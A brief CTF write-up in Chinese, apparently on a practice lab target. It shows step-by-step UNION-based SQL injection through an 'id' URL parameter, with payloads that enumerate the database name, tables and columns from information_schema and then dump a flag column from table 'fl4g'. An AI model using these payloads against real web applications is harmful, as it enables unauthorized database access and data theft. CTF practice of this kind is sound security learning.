打开靶机
看见url里id=0
直接给他改成=1
那说明存在注入点
尝试id=2
尝试=3
按照提示来add
所以字段数为3,在3处可以显位
用联合查询
?id=-1' union select 1,database(),3 --+
得到数据库名为notes
再查表名
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
预判在fl4g表里,打开该表
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fl4g'--+
然后爆数据得到flag
?id=-4' union select 1,database(), group_concat(fllllag) from fl4g --+
over.